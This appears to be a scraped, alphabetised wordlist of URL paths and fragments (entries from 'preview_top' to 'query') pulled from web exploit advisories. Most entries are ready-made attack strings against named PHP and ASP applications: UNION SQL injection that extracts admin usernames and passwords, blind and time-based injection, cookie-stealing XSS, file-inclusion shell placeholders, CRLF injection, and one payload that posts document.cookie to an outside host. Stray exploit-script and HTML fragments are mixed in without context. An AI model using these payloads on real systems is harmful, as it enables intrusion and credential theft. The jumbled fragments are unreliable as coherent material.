preview_top.php?popup=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
preweb.asp
prg_finansovo
pr.hosp.ncku.edu.tw
priasantai.uni.cc
  >>> Price : 10$
 - Price:200$
prime
print
print_article.php?id=5+and substring(version(),1,1)=5 
print_article.php?id=[idnumber]+and+(select+substring(concat(1,password_column),1,1)+from+admin_info_table+limit+0,1)=1
print_article.php?id=[idnumber]+and+(select+substring(concat(1,username_column),1,1)+from+admin_info_table+limit+0,1)=1
print_article.php?id=[id number]+and substring(version(),1,1)=4 
print_article.php?id=[id number]+and substring(version(),1,1)=5
print_article.php?id=[SQL] 
printbar.php?views_path=[[Sh3LL Script]]
print_button.php?globals[pageid]="><script>alert(document.cookie);<
print-coupon.php?ID=-1' UNION ALL SELECT 1,version(),database(),current_user(),5,6,7,8,9,10--%20
Printer
printer.php?article='
printfaq.php?lng=en&pg=
printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1
printfriendly.php?RESPATH=[[Sh3LL Script]]
print $http . "\n";
print.inc.php
Printing
printing.asp 
PrintInvoicePage.class.php?base_path=[evil_scripts]
print_list.php?dir=%22%3E%3Cscript%3Ealert%281%29%3C
print_list.php?show=%22%3E%3Cscript%3Ealert%281%29%3C
printLog.inc.php
printLog.php?id=0+UNION+SELECT+";
print_me.php?ckey=[SQL] 
printpage.asp (Parameter pr)
printpage.asp (Parameter psPrice)
printpage.asp (Parameter sbr)
print.php?category=0%27%20UNION%20SELECT%20version%28%29%20--%202
print.php?cat=[Sql]
print.php?cmd=log&entry=999'% 20union%20select% 201,2,3,4,5, 6
print.php&id=1'
print.php?id=1'+and+1=1
print.php?id=3
print.php?id=-98
print.php?ide=..
print.php?id=<script>alert(1)<
print.php?id=[SQL]
print.php?id=[SQL2]
print.php?id=x AND 1=1 or 1=0
print.php?lang=en&layout=def&newsnr=-999      #
print.php?lessid=-1%20union20select20null,null,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null,null,null,null%20FROM%20modretor
print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201
print.php?news_id=-999' UNION SELECT 0,username,	#
print.php?page=..
print.php?page_include=..
print.php?reporeid_print=&forumid=[SQL]
print.php?reporeid_print=[SQL] 
print.php?section=[file]%00 
print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1
print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E
print.php?task=person&id=36 and 1=1
print.php?task=person&id=36 and 1=2
print.php?task=person&id=36 [SQL]
print.php?theme_dir=..
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1 
printRecipe.inc.php
print_r($send_http);
print.shtml?page=-1+union+select+1
printthread.php?tid=1%3Cscript%3Ealert(document.cookie)%3C
printthread.php?tid='[sql_query]
printview.php?func=con&pvid=-1
printview.php?func=news1&pvid=-55%20union%20all%20select%201,group_concat%28column_name%29,3,4,5,6,7,8%20from%20information_schema.columns%20where%20table_name=0x647363315f61646d696e5f616363657373--
printview.php?func=news1&pvid=-55%20union%20all%20select%201,group_concat%28table_name%29,3,4,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--
printview.php?func=news1&pvid=-55%20union%20all%20select%201,@@version,3,4,5,6,7,8--
printview.php?phpEx=
printview.php?phpEx=[ LFI ]
printview.php?t={existing_topic's_id}&order_sql=UNION%20
printXML.inc.php
prirato1
pritlog
priv
privat
privat2
private
private-node.net
private.php
private.php?action=do_folders&folder['<strong>sql<
private.php?action=do_stuff&delete=1&check['<strong>sql<
private.php HTTP
private.php" method="post"
private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C
privmsg.php?folder=inbox&sid=$sid HTTP
privmsg.php?mode=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C 
privmsg.php?mode=""><script>alert(document.cookie);<
'>Privoxy<
priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts ;
prn_redirect.php
prn_redirect.php?PARAM_0=36&PARAM_1=3
pro
pro7.altervista.org
problems.php" method="post">
proc
process3.php?formname=attack.php%00*name[0]=
processform.php3?failed=<script>alert(document.cookie)<
processform.php3?name=<script>alert(document.cookie)<
process.htm?action=product&member=justme&product=11-2%2b2*3-6&send=yes
process-mystatus.php?action=delete&statid=[SQLi]
processor
processor.inc.php?install_root=[Shell]
processor.php?content_path=..
processor.php?content_path=[evil_code_path]           #
process.php">
process.php?DEFAULT_SKIN=[Evil_Script]
process.php?pname=ShowAlbumDetailsProcess-Start&CategoryID=CategoryID&AlbumID=[sql] 
process.php?pname=ShowAlbumProcess-Start&CategoryID=1
process.php?update=yes">
process_signup.php?login=[CRLF] 
process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1
ProcessTemplates.do?method=createProcessTemplate&templatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
Pro-Desk-Support-Center
Pro-Desk-Support-Center.html
prod_motors.php?id=-999+union+all+select+1,2,3,4,5,group_concat(id,0x3a,user,0x3a,pass),7,8,9,10,11,12+from+users
prodotti
prodotti.php?id='6
prodotti.php?id=-6+union+select+1,concat(username,0x3a,password)+from+utenti
prodotti.php?id=[SQLI]
prod.php?cat=7+and+1=2++union+all+select+database()--
prodshow.php?id=1 UNION SELECT 1,concat(user_password,char(58),user_name),3,4,5,6,7 FROM administrators
prodshow.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7
prod_syn.php
product
product-10.html
product-13.html
/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time
/?product=%22+ANY_SQL
product.about.php?id=12
product.asp?PID=68900247
product.asp?PID=74332316
/?product=[BLIND]&panel=rent%2Fselect_time
productDelete.asp?iPro=37&iCat=12[SQL Inject]
product.demo.php?id=11
product.demo.php?id=12
product.demo.php?id=16
productdemos
product_desc.php?id=-1
product_desc.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
product_desc.php?id=979 [SQL Injection]
product_desc.php?id=<SQL C0de>                  #
product_desc.php?pid=1
product_desc.php?pid=[vul]
product_detail.php?cid=9&pid=-1 UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16
productdetail.php?id=-231+union+select+1,2,3,password,5+from+watch2td_db.tbl_users>--
productdetail.php?id=-231+union+select+1,2,3,userName,5+from+watch2td_db.tbl_users>--
product_detail.php?id=7[CODE]
product_detail.php?item_id=-122%20union%20select%201,2,3,group_concat%28Login_Name,0x3a,Password%29,5,6,7,8,9+from+login_table
product_details
product_details.php?category_id=0&item_id=3
product_details.php?category_id=0&item_id=5
product_details.php?id=[SQL}
product_details.php?item_id=1
product_details.php?item_id=5
product_details.php?item_id=6
product_details.php?product=[SQL]
productEdit.asp?iPro=34&iCat=12[SQL Inject]
[product_home]
product.html
product.html?id=[SQLi]
".$productid{"p"});
product_info.php
product_info.php?cPath=22&products_id=43 (299 euro)  :) 
product_info.php?cPath=24&products_id=79
product_info.php?cPath=30&products_id=86
product_info.php?cPath=31&products_id=81
product_info.php?cPath=36_53&products_id=162
productinfo.php?id=236+AND+1=2+UNION+SELECT+1,concat(user()),concat(user()),4,5,concat(user()),concat(user()),concat(user()),9,10,11,12,13,14,15-- 
productinfo.php?id=[SQL injection]
product_info.php?products_id=163        =
product_info.php?products_id=454
product_info.php?products_id=65
product_info.php?products_id=67
product_info.php?products_id=69
product_info.php?products_id=73
productionnu2
product_list.php?cat=[sqli]
/?product=news-manager>
/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time
productos.bvsalud.org
productos.php?CAT=[sql]
product&path[]
product&path=%27&product_id=[SQL]
product-photoz
product.php?cat=16'%20UNION%20ALL%20SELECT%201,@@version,3
product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--
product.php?category_id=1&subcategory_id=[$qL]
product.php?cat_id=-29 union select 1,group_concat(login,0x3a,password),3,4,5,6,7+from+login_table
product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users-- 
product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- 
product.php?cat=[sqli]
product.php?disproid=53+AND+1=2+UNION+SELECT+0,1,version%28%29,3,4--
product.php?id=-1%20union%20select%200,1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,group_concat%28column_name%29,23,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29
product.php?id=14 [ Add An Event ]
product.php?id=1 [ Add An Ad Cart ]
product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik1_brugere
product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik2_brugere
product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik3_brugere
product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik4_brugere
product.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--  
product.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C
product.php?id=-28+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+admin--
product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin--
product.php?id=lildbi-web?=en
product.php?id_product=46
product.php?mode='><script>alert(document.cookie)<
product.php?mode='[SQL-inj]
product.php?prodID=9999 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
product.php?prodID=[SQLi]
product.php?productid='%27%20having%201=1
product.php?productid=40826&cat=0&page=1  ]
product.php?product_id=[Cross Site Scripting]
product.php?productid='><script>alert(document.cookie)<
product.php?productid='[SQL-inj]
product.php?product_id=[SQL Injection]
product.php?productid=' {SQL Injection}
product.php?sid=17'
product.php?sid=[SQLI]	
product&product_id=137 :
product.purchase.php?id=12
product_reviews_info.php?products_id=4'
product_reviews_info.php?products_id=4[ERROR BASED SQL INECTION]
product_reviews_info.php?products_id=x[SQL INJECTION]
products
products)
Products
products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C
products1.php?id=6&id2='SQLINJECTION&subcat=Asus&p=products1 
products.asp
products_by_cat.php?Cat_id=1[CODE]
products_category.php") via http POST method.
products_details.php?sbid=[id number]
products.html                                 ###  
Products.html.php
productsofcat.asp?p=1&category_id=17+and+1=100 (false)
productsofcat.asp?p=1&category_id=17+and+1=1 (true)
productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
ProductsPage.class.php?base_path=[evil_scripts]
products.php
products.php 
products.php?action=delete&product_id='SQL'
products.php?action=<script>alert(0)<
products.php?cat=-1+union+select+database(),version(),3,4,5,6,user()
products.php?cat=[SQLI]   
products.php?cid=-17+UnioN+AlL+SelEct+1,concat(sb_lastlogin,0x3e,sb_password),3,4,5,6,7,8+from+trade_members--
products.php?cid=1[SQL]
products.php?cid=[SQL]
products.php?cid=[SQLI]
products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin
products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin
products.php?ctf=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+information_schema.tables--
products.php?ctf=-1+union+select+0,1,2,3,4,5,6,concat%28ID,username,password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users
products.php?ctf={sqli}
products.php?id='
products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
products.php?id=18&associate=
products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--
products.php?imovelfor_id=[sqli]
products_php-library.htm   #
products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users
products.php?pid=[id number]
products.php?prod_id=-1%20union%20select%201,2,3,4,5,database(),version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76--
products.php?prod_id=-22653%20union%20select%201,2,3,4,5,database(),version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76--
products.php?prod_id=[SQL]
products.php?product=phpbazar
products.php?sid=1 (SQL)
products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
products?pid=[SQLi]
/?product=[SQL]&panel=rent%2Fselect_time
products_view.php?id=[sqli]
productuk.php?id=-1%20union%20select%200,1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat%28column_name%29,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29
productUrl>
productview.php?id=[SQL injection]
productview.php?prdid='1
produkt-3041.html
produkt-3051.html<
produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user
prof3ta.netsons.org
profbiz-cart.sourceforge.net
professor
profil.class.php?path_om=[Shell]
profil.class.php?path_om[Shell]
profil_degistir_yap.php">
profile
profile">
profile%00
profilealbums
profile_background_images
profile-blogs
profile_data.php?profile_id=<script>alert(123);<
profile-edit-save">
profile.form.php?ID=2+and+1=1337
profileimage
profile.inc.php
[profile-name]
profile.php
profile.php 
profile.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
profile.php?action=avatar_gallery&id={your registered user ID here}
profile.php?action=editprofile&id=1
profile.php?action=editprofile&id=[Your User ID]
profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C
profile.php?action=ims&type=msn&id=1
profile.php?action=new
profile.php?action=observe&saction=del&id=[SQL-STATEMENT]
profile.php?action=show&saction=moreinfo&userid=-1+UNION+SELECT+1,concat(username,0x3a,password,0x3a,email)+FROM+wgcc_user--
profile.php?action=show&saction=moreinfo&userid=-1+UNION+SELECT+1,concat(username,0x3a,passwort,0x3a,email)+FROM+wgcc_user--
profile.php?action=show&userid=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%74%6C%65%74%2E%68%74%6D%6C%3C
profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--
profile.php?action=view&uname=..
profile.php?do=editpassword
profile.php?fbpassword="><script>alert(document.cookie)<
profile.php?fbusername="><script>alert(document.cookie)<
profile.php (first- and last-name)
profile.php?GlobalSettings[templatesDirectory]=evill
profile.php?id=-1
profile.php?id=100000563647147
profile.php?id=100002938082057
profile.php?id=10' AND 1=0%23
profile.php?id=10' AND 1=1%23
profile.php?id=10' UNION SELECT 1,2,3,4,5%23
profile.php?id=-19+union+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+PHPAUCTION_adminusers--
profile.php?id=1&tab=edit">
profile.php?id=1&tab=edit" 
profile.php?id=-1' UNION ALL SELECT
profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1--	      \
profile.php?id=-5 union select 0,group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from+expert
profile.php? id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14, 15,161,7,18, 19,20
profile.php?id=[sql]
profile.php?id=[SQL]												      \
profile.php?id=[SQLi]
Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
profile.php?member=1 AND IF(ASCII((SELECT CHAR(90)))
profile.php?member=2+AND+1=0 --> FALSE
profile.php?member=2+AND+1=1 --> TRUE
profile.php?member=".$myid;
profile.php" method="post">
profile.php" method="post" >
profile.php" method="POST" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
profile.php?mid=72[CODE]
profile.php?mode=edit&myid=1&uhobbies="><script>alert(document.cookie)<
profile.php?mode=edit&myid=1&ulocation="><script>alert(document.cookie)<
profile.php?mode=editprofile&r_about="&lt;
profile.php?mode=register
profile.php?mode=viewprofile&u=\[]\ 
profile.php?mode=viewprofile&u='[sqlcode]
profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2Fwww.example.com%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E 
profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin
profile.php?root_path=[evil_scripts]
Profile.php?SES_ID=| Your Session Id |&do=show&uid=-225+union+select+1,2,3,4,concat(Admin_Name,0x3a,Admin_Password),6,7,8,9,10,11,12+from+tbl_setting--
profile.php> tmp.html
profile.php" under the <form tags> 
profile.php?u=<script>JavaScript:alert(document.cookie);<
profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1
profile.php?UserID=1&UserName=<br><script>alert(document.cookie);<
profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--
profile.php?user_id=29and
profile.php?user_id=29&auction_id=9<script>alert(1);<
profile.php?user_id=-3%27%20UNION%20SELECT%201,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86
profile.php?user_id="; #Put
profile.php?userid=[SQL]
profile.php?userid=[SQL] 
profile.php?userName= (SQL)*
profiles
profile_save_widgets.php
profilesetting.php
profiles here you can direct upload shell instead of images.
profile_social.php?id=[BSQLi]
profiles.php?cid=[SQL] 
profiles.php" method="post">'
profiles.php?profile_id="><script>alert(123);<
profiles.php?profile_id=z&did="><script>alert(123);<
profiles.php?source_table="><script>alert(123);<
profiles.php?uid=<script>alert(document.cookie)<
profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)<
profiles.wordpress.org
profile-update.php\r\n";
profile_view.php?id='
profile_view.php?id=1
profile_view.php?id=1+AND+1=2+UNION+SELECT+1,2,concat(user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
profile_view.php?id=1+AND+1=2+UNION+SELECT+1,2,concat(version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
profileview.php?uid='1
profile_view.php?userid=-1%20union%20select%201,2,3,4,5,@@version%20
profile_view.php?userid=-1 union select 1,2,3,4,5,@@version 
profile-wii-friend-code
profil.php?id='[SQL Injection] 
profil.php?link=[SQL]
profit_loss.php
prog
program
Program%20Files
program_files
Program+Files
programming
programmy
programs
progs
ProgSys
progsys.php?lang=en
proioncategory_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
proj
project
Project
project-alumni
project.asp?pid=20
projectbutler
ProjectCategory.class.php?gfcommon=[Shell]
projectcms.org
projectcms.org								     |
projectDetail.asp?projectID=226
projectDetail.asp?projectID=240
project_details.php?pid=68(SQL)
ProjectGroup.class.php?gfcommon=[Shell]
ProjectGroupFactory.class.php?gfcommon=[Shell]
ProjectGroupHTML.class.php?gfcommon=[Shell]
project_home.php?gfwww=[Shell]
ProjectHtmlSearchRenderer.class.php?gfwww=[Shell]
projectlabels
projectlabels-init.phpGLOBALS[sys_plugins_path]=[Shell]
projectman1
[project number]
project.php
project.php?do=issuelist&projectid=1
project.php?issueid=118
project.php?issueid=176
project.php (stable version)
ProjectPier-0.8.8-Shell-Upload.html']
ProjectRssSearchRenderer.class.php?gfwww=[Shell]
projects
Projects
ProjectSearchQuery.class.php?gfcommon=[Shell]
projects_hierarchy
projects_hierarchy-init.php?gfplugins=[Shell]
projects.nbishop.name
projects.php
projects.php?id=1+union+select+0,1,concat_ws(user(),0x3a,database(),0x3a,version()),3,4,5,6--
projects.php?idp=-721)%20UNION%20SELECT%20@@version%23
projects.php?idp=-721) UNION SELECT @@version%23
projects.php?id=[SQL]
projects.php?show=<script>alert(1)<
projects.php?subMnuItem=1
projects.simpleboard
projects_site
projects.xivo.fr
ProjectTask
ProjectTask.class.php?gfcommon=[Shell]
ProjectTaskFactory.class.php?gfcommon=[Shell]
ProjectTaskHTML.class.php?gfcommon=[Shell]
ProjectTasksForUser.class.php?gfcommon=[Shell]
projekte
projekt-shop.html
proj.sitellite
promanager
[proManager_path]
proman_xpress.html )
prometheus-all
promise
promote
[promote]
proof-of-concepts
prop_aktivitet.php
properties?fID=%s"
properties_view.php?editid1=2%20and%20substring(@@version,1,1)=4
properties_view.php?editid1=2%20and%20substring(@@version,1,1)=5
property_detail.php?idproperty=[SQLi]
propertyfinder
propertylux.php?ID=1 (SQL)
property_more.php?id=-9999 union select 0,version(),2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11 from users
property.php
property.php?action=property&property_id=[SQL]
property.php?cid=0&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16%20from%20users%20%20where%20username%20not%20in%20(0x71616E6174696E)
property.php?cid=12&uid=0&pid=-168+union+select+1,username,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17+from+gallery_user--
property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users
property.php?ID=199 (SQL)
ProPHP
pro.phpauction.org
proplayer
proplus
propublish
proquiz
proquiz.softon.org
proquizv2b
ProspectLists
Prospects
protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=' 
protection.php?mode=display&username=[LOGIN]&password=[PASSWORD] 
protector
protect.php?action=<script>alert(0)<
Protocols
pro-traffic
prova
'.$proxh.'
[Proxima_path]
proxy
".$proxy."
".$proxy);
$proxy
$proxy");
proxyconfig.cgi
'.$proxy) if $proxy;
proxyip:port)                                           |\n";
"; # proxy:port ...
proxy:port
$proxy:$proxyip
prozilla.net
PRV.php?c=d&d=[path]
PRV.php?c=l&d="><script>alert(
PRV.php?c=setup&ref="><script>alert(
PRV.php?&c=v&d=[path]&f="><script>alert(
przyklady
ps
PSA-LFI.pdf
PSCFV-5204
/?p=server&sub=chars
psf
psi-cms-v.0.3.1
psilo
psilo.php?artifact.208
psilo.php?artifact.89
psilo.php?download.699
psi.tarakan.eu
psm
/?p&s=md5&_=&q=','','<div id="result">([^<]+)<
/?p&s=md5&q='.$hash);
/?p&s=md5&q=$hash");
/?p=spnews&id=-10+UNION+SELECT+1,version(),3,4--
/?p=spnews&id=-12+UNION+SELECT+1,version(),3,4--
/?p=spnews&id=-7+UNION+SELECT+1,version(),3,4--
/?p=" + str(postID)
psychostats.us
psys
/?pt=4&rfid=55
p><table
p><table width="84%
p> <table width="84%"><tr>  <td
p><table width="84%"><tr><td    width="43%">
p><table width="84%"><tr>   <td width="43%">
p><table width="84%">  <tr> <td width="43%">
p> <table  width="84%"><tr><td width="43%">
p><table width="84%"><tr><td width="43%"> <form
p><table width="84%"><tr><td width="43%">  <form
p> <table width="84%"><tr><td width="43%"> <form
ptag
ptc_advance
ptc_basic
pt_config.inc
pt_core_users
ptc_professional
/?p=tech&a=ntech then goto Exploit...
/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=4--
/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5--
p-themes
ptk_exploit_poc.avi
ptk-forensics
<ptk_ip_address>:80
pt_upload.php?config_file=[local server file]&ptconf[src]=[ shell ]?
pub
pub23.127.0.0.1:1336
pub37.137.0.0.1:8080
pub_blocks
public
Public
publication
publications
public_html
public_includes
publico
public-relations
publisher
publisher.php?action=password_reminded
publisher.php?action=user_login
publisher.php?id=%27JBPEDONFAU
Publish [Referer HTTP header]
pub_nmsg.php?report=pst&bgid=1&fmid=8&ptid=-1 union select [SQL-INJECTION]--
pub_openpic.php?fnid=10&bgid=1&fmid=-1 union select [SQL-INJECTION]--
pub_popup
pub_readpost.php?bgid=1&ptid=-1 union select [SQL-INJECTION]--
pub_readpost.php?bgid=-1 union select [SQL-INJECTION]--
pubs
pub_templates
Puglia_Landscape
pull
pulsecms
pulse-cms-basic-local-file-inclusion-vulnerability-cve-2010-4330
PUMA_1.0_RC_2_(config.php)_R FI.htm
punBB
punbb_1-2-16_fr
punbb.org
puntal
/?p=UploadItems
/?p=upload_personal_document - personal document upload
/?p=upload_shared_document - Shared document upload
purchase
purchase.html.php?mosConfig_absolute_path=[shell] "
purchase.php
purchase.php                                             ###
purchase.php?jamroom[jm_dir]=[shell]
purchasing
pure-html
purge.php?gfplugins=[Shell]
pustaka
">put_code<
put_SCRIPT>
 put THE php shell here
puzzle
Puzzle Apps CMS 3.2
puzzlecms
puzzle.dl.sourceforge.net
pvote
 ?p=vzh&pid= [SQL]
pw
pwd
[pwd]
pwned.html')]
pwngame
pwn.php?ID=1 and 1=0
pwn.php?ID=1 and 1=1
pwn.php?ID=1 [Blind]
PwP2.5.1.1.rar
pwsphp\"><br>"
pxsystem
pxsystem.sourceforge.net
pyrmont-v2
pyro2_1_3_1
pyrocms
pyrocms_professional
pyrophobia
.*?)\?q=
/?q=1%27%29%20AND%20%28SELECT%209602%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28CHAR%2858,109,111,110,58%29,%28SELECT%20%28CASE%20WHEN%20%289602=9602%29%20THEN%201%20ELSE%200%20END%29%29,CHAR%2858,107,109,109,58%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29%20AND%20%28%27LMEk%27=%27LMEk&channel=
/?q=1') AND (SELECT 9602 FROM(SELECT
qabandi.php'
qas
[QBoard_path]
qc
qcodo
/?q=comment
qcontacts.html
qcontacts.html*
qdblog
qdPM
qdpm.net
/?q=forum
/?q=[HASH]&s=md5&go=Search',
/?q=improve-opencart-security#change_encryption_key
/?q=intext:© CGI-Central.NET, 2002-2006
/?q=inurl:
qkhash.php?mode=txt&hash=','','<
qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash
/?q=node
Qoolrc2
qooxdoo-sdk
qoY9LHkO
/?q=Schuldnerprojekt
qsearch
/?qsID=1370626098&action=deleteFormAnswers")
/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')<
/?q=[SQL Injection]
/?q=SQLin&search_type=tags&tag_names=location'
qtf_checkname.php?lang=.
qtf_j_birth.php?lang=.
qtf_j_exists.php?lang=.
qti_checkname.php?lang=.
qti_usr.php?id=4+UNION+ALL+SELECT+0,pwd,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+qtiuser+WHERE+id+=+1--
qto
qtofm.php?delete=COPYING&u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C
qtofm.php?edit=qtofm.php&u=[username]&pathext=
qtofm.php?u=[username]&pathext=1&edit=readme%2Etxt HTTP
qtvdotnet
qtv.mdb
qualitypointtech.net ]
quantumstar
query
$query");
query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP
query?%0D%0AInjectedHeader:%20BugSec
query.class.php?baseDir=[evil_scripts]
queryframe.php?lang=en-iso-8859-1&server=1&hash="><script>alert(document.cookie)<
query?group=
